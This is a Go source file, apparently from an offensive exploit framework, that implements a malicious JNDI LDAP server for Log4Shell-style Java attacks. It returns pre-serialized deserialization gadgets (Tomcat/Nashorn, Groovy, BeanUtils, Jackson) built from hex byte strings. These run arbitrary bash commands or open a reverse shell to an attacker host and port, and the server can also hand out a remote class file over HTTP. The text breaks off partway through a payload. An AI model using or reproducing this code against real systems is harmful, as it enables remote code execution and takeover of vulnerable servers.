// This is an implementation of an evil JNDI LDAP server. The server accepts
// connections and returned a malicious serialized object in response to
// a search. Serialization is obviously native to Java. To work around this,
// we pre-serialized some gadgets that use Nashorn as their sink. The desired
// command is inserted into the pre-compiled gadget (and padded if needed). Not
// perfect, but not half bad, I think. Inspiration from:
//
// * https://github.com/veracode-research/rogue-jndi
// * https://github.com/For-ACGN/Log4Shell
// * https://github.com/zzwlpx/JNDIExploit
package ldapjndi

import (
	b64 "encoding/base64"
	"encoding/binary"
	"fmt"
	"io"
	"log"
	"net/http"
	"strconv"
	"strings"

	message "github.com/lor00x/goldap/message"
	ldap "github.com/vjeantet/ldapserver"
	"github.com/vulncheck-oss/go-exploit/java"
	"github.com/vulncheck-oss/go-exploit/output"
)

// mapping of available pre-serialized gadgets.
type GadgetName int

const (
	// org.apache.naming.factory.BeanFactory + javax.el.ELProcessor#eval (windows + Linux).
	TomcatNashornReverseShell GadgetName = 0
	// org.apache.naming.factory.BeanFactory + javax.el.ELProcessor#eval (linux only).
	TomcatGenericBash GadgetName = 1
	GroovyGenericBash GadgetName = 2
	// org.apache.naming.factory.BeanFactory.
	BeanUtils194GenericBash GadgetName = 3
	// load class via an HTTP server.
	HTTPReverseShell GadgetName = 4
	// See implementation in java.JacksonGenericCommand.
	JacksonGenericCommand GadgetName = 5
)

// a dirty way to pass the user's desired gadget to `handleBind`.
var GlobalSerializedPayload string

// a dirty way to pass the user's desired name to `handleBind`.
var GlobalName string

// if the class is loaded from a secondary http server, this will be set.
var GlobalHTTPServer string

// automatically accept.
func handleBind(w ldap.ResponseWriter, _ *ldap.Message) {
	output.PrintFrameworkSuccess("Received a bind request!")
	res := ldap.NewBindResponse(ldap.LDAPResultSuccess)
	w.Write(res)
}

// Accept the incoming request. Verify it is asking for the correct endpoint
// and then send the user's requested gadget'.
func handleSearch(writer ldap.ResponseWriter, msg *ldap.Message) {
	if len(GlobalSerializedPayload) == 0 {
		output.PrintFrameworkError("A serialized payload was never configured!")
	}

	req := msg.GetSearchRequest()
	dname := string(req.BaseObject())

	if dname != GlobalName {
		output.PrintfFrameworkError("Received an unexpected request: %s != %s\n", dname, GlobalName)

		return
	}

	// send search result
	res := ldap.NewSearchResultEntry(dname)
	if strings.HasPrefix(GlobalSerializedPayload, "\xca\xfe\xba\xbe") {
		res.AddAttribute("javaClassName", "foo")
		res.AddAttribute("javaCodeBase", message.AttributeValue(GlobalHTTPServer))
		res.AddAttribute("objectClass", "javaNamingReference")
		res.AddAttribute("javaFactory", message.AttributeValue(GlobalName))
	} else {
		res.AddAttribute("javaClassName", "java.lang.String")
		res.AddAttribute("javaSerializedData", message.AttributeValue(GlobalSerializedPayload))
	}
	writer.Write(res)

	done := ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess)
	writer.Write(done)
	output.PrintFrameworkSuccess("Serialized payload sent!")
}

func CreateLDAPServer(name string) *ldap.Server {
	// disable logging from the ldap implementation
	ldap.Logger = log.New(io.Discard, "", 0)

	server := ldap.NewServer()
	if server == nil {
		return nil
	}

	// attach our functions to bind and search
	routes := ldap.NewRouteMux()
	routes.Bind(handleBind)
	routes.Search(handleSearch)
	server.Handle(routes)

	// set a name so that we aren't tossing exploits at just anyone
	GlobalName = name

	return server
}

func SetLDAPGadget(gadget GadgetName, binary, lhost string, lport int, command string) {
	switch gadget {
	case TomcatNashornReverseShell:
		GlobalSerializedPayload = createTomcatNashornReverseShell(binary, lhost, lport)
	case TomcatGenericBash:
		GlobalSerializedPayload = createTomcatGenericGadget(command)
	case GroovyGenericBash:
		GlobalSerializedPayload = createGroovyGenericBash(command)
	case BeanUtils194GenericBash:
		GlobalSerializedPayload = createBeanUtils194GenericBash(command)
	case JacksonGenericCommand:
		var err error
		if GlobalSerializedPayload, err = java.JacksonGenericCommand(command); err != nil {
			output.PrintFrameworkError(err.Error())
		}
	case HTTPReverseShell:
		fallthrough
	default:
		output.PrintFrameworkError("[-] Invalid payload")
	}
}

func SetLDAPHTTPClass(gadget GadgetName, lhost string, lport int, httpHost string, httpPort int) {
	switch gadget {
	case HTTPReverseShell:
		GlobalSerializedPayload = createHTTPReverseShell(lhost, lport, GlobalName)
	case TomcatNashornReverseShell:
		fallthrough
	case TomcatGenericBash:
		fallthrough
	case GroovyGenericBash:
		fallthrough
	case BeanUtils194GenericBash:
		fallthrough
	case JacksonGenericCommand:
		fallthrough
	default:
		output.PrintFrameworkError("Invalid payload")

		return
	}

	GlobalHTTPServer = "http://" + httpHost + ":" + strconv.Itoa(httpPort) + "/"
	http.HandleFunc("/"+GlobalName+".class", func(w http.ResponseWriter, _ *http.Request) {
		fmt.Fprint(w, GlobalSerializedPayload)
	})

	output.PrintfFrameworkStatus("Starting HTTP Server on %s:%d", httpHost, httpPort)
	httpFunc := func(httpHost string, httpPort int) {
		_ = http.ListenAndServe(httpHost+":"+strconv.Itoa(httpPort), nil)
	}
	go httpFunc(httpHost, httpPort)
}

// this function creates a org.apache.naming.factory.BeanFactory + javax.el.ELProcessor#eval
// payload that will execute a nashorn payload. The payload is a reverse shell. This gadget
// has been pre-compiled (because we aren't executing from java). To make this work, the
// function replaces three values that already exist in the binary. Specifically:
// "cmd.exe" -> binary
// "10.9.49.242" -> lhost
// 1270 -> lport
// The change in size will then be accounted for in the padding variable.
func createTomcatNashornReverseShell(binary, lhost string, lport int) string {
	shellPayload := "\xac\xed" +
		"\x00\x05\x73\x72\x00\x1d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65" +
		"\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x52\x65\x73\x6f\x75\x72\x63\x65" +
		"\x52\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x78\x72" +
		"\x00\x1d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x6e\x61\x6d" +
		"\x69\x6e\x67\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x52\x65\x66\x00" +
		"\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x78\x72\x00\x16\x6a\x61" +
		"\x76\x61\x78\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x52\x65\x66\x65\x72" +
		"\x65\x6e\x63\x65\xe8\xc6\x9e\xa2\xa8\xe9\x8d\x09\x02\x00\x04\x4c" +
		"\x00\x05\x61\x64\x64\x72\x73\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f" +
		"\x75\x74\x69\x6c\x2f\x56\x65\x63\x74\x6f\x72\x3b\x4c\x00\x0c\x63" +
		"\x6c\x61\x73\x73\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x12\x4c\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b" +
		"\x4c\x00\x14\x63\x6c\x61\x73\x73\x46\x61\x63\x74\x6f\x72\x79\x4c" +
		"\x6f\x63\x61\x74\x69\x6f\x6e\x71\x00\x7e\x00\x04\x4c\x00\x09\x63" +
		"\x6c\x61\x73\x73\x4e\x61\x6d\x65\x71\x00\x7e\x00\x04\x78\x70\x73" +
		"\x72\x00\x10\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x56\x65\x63" +
		"\x74\x6f\x72\xd9\x97\x7d\x5b\x80\x3b\xaf\x01\x03\x00\x03\x49\x00" +
		"\x11\x63\x61\x70\x61\x63\x69\x74\x79\x49\x6e\x63\x72\x65\x6d\x65" +
		"\x6e\x74\x49\x00\x0c\x65\x6c\x65\x6d\x65\x6e\x74\x43\x6f\x75\x6e" +
		"\x74\x5b\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x44\x61\x74\x61\x74" +
		"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" +
		"\x6a\x65\x63\x74\x3b\x78\x70\x00\x00\x00\x00\x00\x00\x00\x05\x75" +
		"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f" +
		"\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00" +
		"\x00\x78\x70\x00\x00\x00\x0a\x73\x72\x00\x1a\x6a\x61\x76\x61\x78" +
		"\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x52\x65" +
		"\x66\x41\x64\x64\x72\x84\x4b\xf4\x3c\xe1\x11\xdc\xc9\x02\x00\x01" +
		"\x4c\x00\x08\x63\x6f\x6e\x74\x65\x6e\x74\x73\x71\x00\x7e\x00\x04" +
		"\x78\x72\x00\x14\x6a\x61\x76\x61\x78\x2e\x6e\x61\x6d\x69\x6e\x67" +
		"\x2e\x52\x65\x66\x41\x64\x64\x72\xeb\xa0\x07\x9a\x02\x38\xaf\x4a" +
		"\x02\x00\x01\x4c\x00\x08\x61\x64\x64\x72\x54\x79\x70\x65\x71\x00" +
		"\x7e\x00\x04\x78\x70\x74\x00\x05\x73\x63\x6f\x70\x65\x74\x00\x00" +
		"\x73\x71\x00\x7e\x00\x0b\x74\x00\x04\x61\x75\x74\x68\x71\x00\x7e" +
		"\x00\x0f\x73\x71\x00\x7e\x00\x0b\x74\x00\x09\x73\x69\x6e\x67\x6c" +
		"\x65\x74\x6f\x6e\x74\x00\x04\x74\x72\x75\x65\x73\x71\x00\x7e\x00" +
		"\x0b\x74\x00\x0b\x66\x6f\x72\x63\x65\x53\x74\x72\x69\x6e\x67\x74" +
		"\x00\x06\x78\x3d\x65\x76\x61\x6c\x73\x71\x00\x7e\x00\x0b\x74\x00" +
		"\x01\x78\x74\x02\xad\x7b\x22\x22\x2e\x67\x65\x74\x43\x6c\x61\x73" +
		"\x73\x28\x29\x2e\x66\x6f\x72\x4e\x61\x6d\x65\x28\x22\x6a\x61\x76" +
		"\x61\x78\x2e\x73\x63\x72\x69\x70\x74\x2e\x53\x63\x72\x69\x70\x74" +
		"\x45\x6e\x67\x69\x6e\x65\x4d\x61\x6e\x61\x67\x65\x72\x22\x29\x2e" +
		"\x6e\x65\x77\x49\x6e\x73\x74\x61\x6e\x63\x65\x28\x29\x2e\x67\x65" +
		"\x74\x45\x6e\x67\x69\x6e\x65\x42\x79\x4e\x61\x6d\x65\x28\x22\x4a" +
		"\x61\x76\x61\x53\x63\x72\x69\x70\x74\x22\x29\x2e\x65\x76\x61\x6c" +
		"\x28\x27\x76\x61\x72\x20\x68\x6f\x73\x74\x3d\x22\x31\x30\x2e\x39" +
		"\x2e\x34\x39\x2e\x32\x34\x32\x22\x3b\x76\x61\x72\x20\x70\x6f\x72" +
		"\x74\x3d\x31\x32\x37\x30\x3b\x76\x61\x72\x20\x63\x6d\x64\x3d\x22" +
		"\x63\x6d\x64\x2e\x65\x78\x65\x22\x3b\x76\x61\x72\x20\x70\x3d\x6e" +
		"\x65\x77\x20\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x50\x72\x6f" +
		"\x63\x65\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x28\x63\x6d\x64\x29" +
		"\x2e\x72\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72\x6f\x72\x53\x74" +
		"\x72\x65\x61\x6d\x28\x74\x72\x75\x65\x29\x2e\x73\x74\x61\x72\x74" +
		"\x28\x29\x3b\x76\x61\x72\x20\x73\x3d\x6e\x65\x77\x20\x6a\x61\x76" +
		"\x61\x2e\x6e\x65\x74\x2e\x53\x6f\x63\x6b\x65\x74\x28\x68\x6f\x73" +
		"\x74\x2c\x70\x6f\x72\x74\x29\x3b\x76\x61\x72\x20\x70\x69\x3d\x70" +
		"\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28" +
		"\x29\x2c\x70\x65\x3d\x70\x2e\x67\x65\x74\x45\x72\x72\x6f\x72\x53" +
		"\x74\x72\x65\x61\x6d\x28\x29\x2c\x20\x73\x69\x3d\x73\x2e\x67\x65" +
		"\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x76" +
		"\x61\x72\x20\x70\x6f\x3d\x70\x2e\x67\x65\x74\x4f\x75\x74\x70\x75" +
		"\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x2c\x73\x6f\x3d\x73\x2e\x67" +
		"\x65\x74\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29" +
		"\x3b\x77\x68\x69\x6c\x65\x28\x21\x73\x2e\x69\x73\x43\x6c\x6f\x73" +
		"\x65\x64\x28\x29\x29\x7b\x77\x68\x69\x6c\x65\x28\x70\x69\x2e\x61" +
		"\x76\x61\x69\x6c\x61\x62\x6c\x65\x28\x29\x3e\x30\x29\x73\x6f\x2e" +
		"\x77\x72\x69\x74\x65\x28\x70\x69\x2e\x72\x65\x61\x64\x28\x29\x29" +
		"\x3b\x77\x68\x69\x6c\x65\x28\x70\x65\x2e\x61\x76\x61\x69\x6c\x61" +
		"\x62\x6c\x65\x28\x29\x3e\x30\x29\x73\x6f\x2e\x77\x72\x69\x74\x65" +
		"\x28\x70\x65\x2e\x72\x65\x61\x64\x28\x29\x29\x3b\x77\x68\x69\x6c" +
		"\x65\x28\x73\x69\x2e\x61\x76\x61\x69\x6c\x61\x62\x6c\x65\x28\x29" +
		"\x3e\x30\x29\x70\x6f\x2e\x77\x72\x69\x74\x65\x28\x73\x69\x2e\x72" +
		"\x65\x61\x64\x28\x29\x29\x3b\x73\x6f\x2e\x66\x6c\x75\x73\x68\x28" +
		"\x29\x3b\x70\x6f\x2e\x66\x6c\x75\x73\x68\x28\x29\x3b\x6a\x61\x76" +
		"\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x65\x61\x64\x2e\x73\x6c" +
		"\x65\x65\x70\x28\x35\x30\x29\x3b\x74\x72\x79\x20\x7b\x70\x2e\x65" +
		"\x78\x69\x74\x56\x61\x6c\x75\x65\x28\x29\x3b\x62\x72\x65\x61\x6b" +
		"\x3b\x7d\x63\x61\x74\x63\x68\x20\x28\x65\x29\x7b\x7d\x7d\x3b\x70" +
		"\x2e\x64\x65\x73\x74\x72\x6f\x79\x28\x29\x3b\x73\x2e\x63\x6c\x6f" +
		"\x73\x65\x28\x29\x3b\x76\x61\x72\x20\x70\x61\x64\x64\x69\x6e\x67" +
		"\x3d\x22\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x22\x27" +
		"\x29\x7d\x70\x70\x70\x70\x70\x78\x74\x00\x25\x6f\x72\x67\x2e\x61" +
		"\x70\x61\x63\x68\x65\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x66\x61\x63" +
		"\x74\x6f\x72\x79\x2e\x42\x65\x61\x6e\x46\x61\x63\x74\x6f\x72\x79" +
		"\x70\x74\x00\x14\x6a\x61\x76\x61\x78\x2e\x65\x6c\x2e\x45\x4c\x50" +
		"\x72\x6f\x63\x65\x73\x73\x6f\x72"

	updatedShellPayload := strings.Replace(shellPayload, "cmd.exe", binary, 1)
	updatedShellPayload = strings.Replace(updatedShellPayload, "10.9.49.242", lhost, 1)
	updatedShellPayload = strings.Replace(updatedShellPayload, "1270", strconv.Itoa(lport), 1)

	if len(updatedShellPayload) < len(shellPayload) {
		updatedShellPayload = strings.Replace(updatedShellPayload,
			"aaaaaaaaaaaa", strings.Repeat("a", 12+(len(shellPayload)-len(updatedShellPayload))), 1)
	} else if len(shellPayload) < len(updatedShellPayload) {
		// technically this should look for overuse (e.g. 12 isn't enough), but doesn't
		updatedShellPayload = strings.Replace(updatedShellPayload, "aaaaaaaaaaaa",
			strings.Repeat("a", 12-(len(updatedShellPayload)-len(shellPayload))), 1)
	}

	return updatedShellPayload
}

// This creates a generic bash command that will be execute via nashorn
// as bash,-c,<command>. This gadget has been pre-compiled (because)
// we aren't executing in Java) so the size has to be adjusted. This
// function will autoadjust the commands size'.
func createTomcatGenericGadget(command string) string {
	if len(command) > 186 {
		output.PrintFrameworkError("The requested command is too long. The exploit will fail.")

		return ""
	}

	// pad the command out
	command += strings.Repeat("#", 186-len(command))

	complete := "\xac\xed" +
		"\x00\x05\x73\x72\x00\x1d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65" +
		"\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x52\x65\x73\x6f\x75\x72\x63\x65" +
		"\x52\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x78\x72" +
		"\x00\x1d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x6e\x61\x6d" +
		"\x69\x6e\x67\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x52\x65\x66\x00" +
		"\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x78\x72\x00\x16\x6a\x61" +
		"\x76\x61\x78\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x52\x65\x66\x65\x72" +
		"\x65\x6e\x63\x65\xe8\xc6\x9e\xa2\xa8\xe9\x8d\x09\x02\x00\x04\x4c" +
		"\x00\x05\x61\x64\x64\x72\x73\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f" +
		"\x75\x74\x69\x6c\x2f\x56\x65\x63\x74\x6f\x72\x3b\x4c\x00\x0c\x63" +
		"\x6c\x61\x73\x73\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x12\x4c\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b" +
		"\x4c\x00\x14\x63\x6c\x61\x73\x73\x46\x61\x63\x74\x6f\x72\x79\x4c" +
		"\x6f\x63\x61\x74\x69\x6f\x6e\x71\x00\x7e\x00\x04\x4c\x00\x09\x63" +
		"\x6c\x61\x73\x73\x4e\x61\x6d\x65\x71\x00\x7e\x00\x04\x78\x70\x73" +
		"\x72\x00\x10\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x56\x65\x63" +
		"\x74\x6f\x72\xd9\x97\x7d\x5b\x80\x3b\xaf\x01\x03\x00\x03\x49\x00" +
		"\x11\x63\x61\x70\x61\x63\x69\x74\x79\x49\x6e\x63\x72\x65\x6d\x65" +
		"\x6e\x74\x49\x00\x0c\x65\x6c\x65\x6d\x65\x6e\x74\x43\x6f\x75\x6e" +
		"\x74\x5b\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x44\x61\x74\x61\x74" +
		"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" +
		"\x6a\x65\x63\x74\x3b\x78\x70\x00\x00\x00\x00\x00\x00\x00\x05\x75" +
		"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f" +
		"\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00" +
		"\x00\x78\x70\x00\x00\x00\x0a\x73\x72\x00\x1a\x6a\x61\x76\x61\x78" +
		"\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x52\x65" +
		"\x66\x41\x64\x64\x72\x84\x4b\xf4\x3c\xe1\x11\xdc\xc9\x02\x00\x01" +
		"\x4c\x00\x08\x63\x6f\x6e\x74\x65\x6e\x74\x73\x71\x00\x7e\x00\x04" +
		"\x78\x72\x00\x14\x6a\x61\x76\x61\x78\x2e\x6e\x61\x6d\x69\x6e\x67" +
		"\x2e\x52\x65\x66\x41\x64\x64\x72\xeb\xa0\x07\x9a\x02\x38\xaf\x4a" +
		"\x02\x00\x01\x4c\x00\x08\x61\x64\x64\x72\x54\x79\x70\x65\x71\x00" +
		"\x7e\x00\x04\x78\x70\x74\x00\x05\x73\x63\x6f\x70\x65\x74\x00\x00" +
		"\x73\x71\x00\x7e\x00\x0b\x74\x00\x04\x61\x75\x74\x68\x71\x00\x7e" +
		"\x00\x0f\x73\x71\x00\x7e\x00\x0b\x74\x00\x09\x73\x69\x6e\x67\x6c" +
		"\x65\x74\x6f\x6e\x74\x00\x04\x74\x72\x75\x65\x73\x71\x00\x7e\x00" +
		"\x0b\x74\x00\x0b\x66\x6f\x72\x63\x65\x53\x74\x72\x69\x6e\x67\x74" +
		"\x00\x06\x78\x3d\x65\x76\x61\x6c\x73\x71\x00\x7e\x00\x0b\x74\x00" +
		"\x01\x78\x74\x01\x65\x7b\x22\x22\x2e\x67\x65\x74\x43\x6c\x61\x73" +
		"\x73\x28\x29\x2e\x66\x6f\x72\x4e\x61\x6d\x65\x28\x22\x6a\x61\x76" +
		"\x61\x78\x2e\x73\x63\x72\x69\x70\x74\x2e\x53\x63\x72\x69\x70\x74" +
		"\x45\x6e\x67\x69\x6e\x65\x4d\x61\x6e\x61\x67\x65\x72\x22\x29\x2e" +
		"\x6e\x65\x77\x49\x6e\x73\x74\x61\x6e\x63\x65\x28\x29\x2e\x67\x65" +
		"\x74\x45\x6e\x67\x69\x6e\x65\x42\x79\x4e\x61\x6d\x65\x28\x22\x6e" +
		"\x61\x73\x68\x6f\x72\x6e\x22\x29\x2e\x65\x76\x61\x6c\x28\x22\x6e" +
		"\x65\x77\x20\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x50\x72\x6f" +
		"\x63\x65\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x28\x29\x2e\x63\x6f" +
		"\x6d\x6d\x61\x6e\x64\x28\x27\x62\x61\x73\x68\x27\x2c\x27\x2d\x63" +
		"\x27\x2c\x27" +
		command +
		"\x27\x29\x2e" +
		"\x73\x74\x61\x72\x74\x28\x29\x22\x29\x7d\x70\x70\x70\x70\x70\x78" +
		"\x74\x00\x25\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x6e\x61" +
		"\x6d\x69\x6e\x67\x2e\x66\x61\x63\x74\x6f\x72\x79\x2e\x42\x65\x61" +
		"\x6e\x46\x61\x63\x74\x6f\x72\x79\x70\x74\x00\x14\x6a\x61\x76\x61" +
		"\x78\x2e\x65\x6c\x2e\x45\x4c\x50\x72\x6f\x63\x65\x73\x73\x6f\x72"

	return complete
}

func createGroovyGenericBash(command string) string {
	encodedCommand := fmt.Sprintf("{echo,%s}|{base64,-d}|{bash,-i}|{ls,", b64.StdEncoding.EncodeToString([]byte(command)))

	if len(encodedCommand) > 157 {
		output.PrintFrameworkError("The requested command is too long. The exploit will fail.")

		return ""
	}

	// pad the command out
	encodedCommand += strings.Repeat("a", 157-len(encodedCommand))
	encodedCommand += "}"

	complete := "\xac\xed" +
		"\x00\x05\x73\x72\x00\x1d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65" +
		"\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x52\x65\x73\x6f\x75\x72\x63\x65" +
		"\x52\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x78\x72" +
		"\x00\x1d\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x6e\x61\x6d" +
		"\x69\x6e\x67\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x52\x65\x66\x00" +
		"\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x78\x72\x00\x16\x6a\x61" +
		"\x76\x61\x78\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x52\x65\x66\x65\x72" +
		"\x65\x6e\x63\x65\xe8\xc6\x9e\xa2\xa8\xe9\x8d\x09\x02\x00\x04\x4c" +
		"\x00\x05\x61\x64\x64\x72\x73\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f" +
		"\x75\x74\x69\x6c\x2f\x56\x65\x63\x74\x6f\x72\x3b\x4c\x00\x0c\x63" +
		"\x6c\x61\x73\x73\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x12\x4c\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b" +
		"\x4c\x00\x14\x63\x6c\x61\x73\x73\x46\x61\x63\x74\x6f\x72\x79\x4c" +
		"\x6f\x63\x61\x74\x69\x6f\x6e\x71\x00\x7e\x00\x04\x4c\x00\x09\x63" +
		"\x6c\x61\x73\x73\x4e\x61\x6d\x65\x71\x00\x7e\x00\x04\x78\x70\x73" +
		"\x72\x00\x10\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x56\x65\x63" +
		"\x74\x6f\x72\xd9\x97\x7d\x5b\x80\x3b\xaf\x01\x03\x00\x03\x49\x00" +
		"\x11\x63\x61\x70\x61\x63\x69\x74\x79\x49\x6e\x63\x72\x65\x6d\x65" +
		"\x6e\x74\x49\x00\x0c\x65\x6c\x65\x6d\x65\x6e\x74\x43\x6f\x75\x6e" +
		"\x74\x5b\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x44\x61\x74\x61\x74" +
		"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" +
		"\x6a\x65\x63\x74\x3b\x78\x70\x00\x00\x00\x00\x00\x00\x00\x05\x75" +
		"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f" +
		"\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00" +
		"\x00\x78\x70\x00\x00\x00\x0a\x73\x72\x00\x1a\x6a\x61\x76\x61\x78" +
		"\x2e\x6e\x61\x6d\x69\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x52\x65" +
		"\x66\x41\x64\x64\x72\x84\x4b\xf4\x3c\xe1\x11\xdc\xc9\x02\x00\x01" +
		"\x4c\x00\x08\x63\x6f\x6e\x74\x65\x6e\x74\x73\x71\x00\x7e\x00\x04" +
		"\x78\x72\x00\x14\x6a\x61\x76\x61\x78\x2e\x6e\x61\x6d\x69\x6e\x67" +
		"\x2e\x52\x65\x66\x41\x64\x64\x72\xeb\xa0\x07\x9a\x02\x38\xaf\x4a" +
		"\x02\x00\x01\x4c\x00\x08\x61\x64\x64\x72\x54\x79\x70\x65\x71\x00" +
		"\x7e\x00\x04\x78\x70\x74\x00\x05\x73\x63\x6f\x70\x65\x74\x00\x00" +
		"\x73\x71\x00\x7e\x00\x0b\x74\x00\x04\x61\x75\x74\x68\x71\x00\x7e" +
		"\x00\x0f\x73\x71\x00\x7e\x00\x0b\x74\x00\x09\x73\x69\x6e\x67\x6c" +
		"\x65\x74\x6f\x6e\x74\x00\x04\x74\x72\x75\x65\x73\x71\x00\x7e\x00" +
		"\x0b\x74\x00\x0b\x66\x6f\x72\x63\x65\x53\x74\x72\x69\x6e\x67\x74" +
		"\x00\x0a\x78\x3d\x65\x76\x61\x6c\x75\x61\x74\x65\x73\x71\x00\x7e" +
		"\x00\x0b\x74\x00\x01\x78\x74\x00\xb2\x27\x62\x61\x73\x68\x20\x2d" +
		"\x63\x20" +
		encodedCommand +
		"\x27\x2e\x65\x78\x65\x63\x75\x74\x65\x28\x29\x70\x70\x70\x70\x70" +
		"\x78\x74\x00\x25\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x6e" +
		"\x61\x6d\x69\x6e\x67\x2e\x66\x61\x63\x74\x6f\x72\x79\x2e\x42\x65" +
		"\x61\x6e\x46\x61\x63\x74\x6f\x72\x79\x70\x74\x00\x17\x67\x72\x6f" +
		"\x6f\x76\x79\x2e\x6c\x61\x6e\x67\x2e\x47\x72\x6f\x6f\x76\x79\x53" +
		"\x68\x65\x6c\x6c"

	return complete
}

func createBeanUtils194GenericBash(command string) string {
	encodedCommand := fmt.Sprintf("bash -c {echo,%s}|{base64,-d}|{bash,-i}|{ls,", b64.StdEncoding.EncodeToString([]byte(command)))

	if len(encodedCommand) > 208 {
		output.PrintFrameworkError("The requested command is too long. The exploit will fail.")

		return ""
	}

	// pad the command out
	encodedCommand += strings.Repeat("a", 207-len(encodedCommand))
	encodedCommand += "}"

	//nolint:dupword // Duplicate words () found
	complete := "\xac\xed" +
		"\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e" +
		"\x50\x72\x69\x6f\x72\x69\x74\x79\x51\x75\x65\x75\x65\x94\xda\x30" +
		"\xb4\xfb\x3f\x82\xb1\x03\x00\x02\x49\x00\x04\x73\x69\x7a\x65\x4c" +
		"\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x74\x00\x16\x4c" +
		"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6d\x70\x61\x72" +
		"\x61\x74\x6f\x72\x3b\x78\x70\x00\x00\x00\x02\x73\x72\x00\x2b\x6f" +
		"\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e" +
		"\x73\x2e\x62\x65\x61\x6e\x75\x74\x69\x6c\x73\x2e\x42\x65\x61\x6e" +
		"\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\xe3\xa1\x88\xea\x73\x22" +
		"\xa4\x48\x02\x00\x02\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74" +
		"\x6f\x72\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x70\x65\x72" +
		"\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" +
		"\x53\x74\x72\x69\x6e\x67\x3b\x78\x70\x73\x72\x00\x3f\x6f\x72\x67" +
		"\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e" +
		"\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x63\x6f\x6d\x70" +
